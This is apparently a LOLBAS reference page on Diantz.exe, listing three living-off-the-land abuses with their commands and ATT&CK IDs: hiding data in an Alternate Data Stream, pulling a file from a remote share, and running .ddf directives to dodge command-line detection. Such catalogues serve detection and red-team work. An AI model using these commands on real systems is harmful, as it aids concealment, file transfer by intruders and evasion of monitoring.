.. /Diantz.exe
Star

Alternate data streams (Compression)
Download (Compression)
Execute (Compression)

Binary that package existing files into a cabinet (.cab) file

Paths:

Resources:

Acknowledgements:

Detections:

Alternate data streams

  1. Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

    diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
    Use case
    Hide data compressed into an Alternate Data Stream.
    Privileges required
    User
    Operating systems
    Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
    ATT&CK® technique
    T1564.004
    Tags
    Type: Compression
    This LOLBAS involves (de)compression of one or more files.

Download

  1. Download and compress a remote file and store it in a cab file on local machine.

    diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
    Use case
    Download and compress into a cab file.
    Privileges required
    User
    Operating systems
    Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
    ATT&CK® technique
    T1105
    Tags
    Type: Compression
    This LOLBAS involves (de)compression of one or more files.

Execute

  1. Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.

    diantz /f directives.ddf
    Use case
    Bypass command-line based detections
    Privileges required
    User
    Operating systems
    Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
    ATT&CK® technique
    T1036
    Tags
    Type: Compression
    This LOLBAS involves (de)compression of one or more files.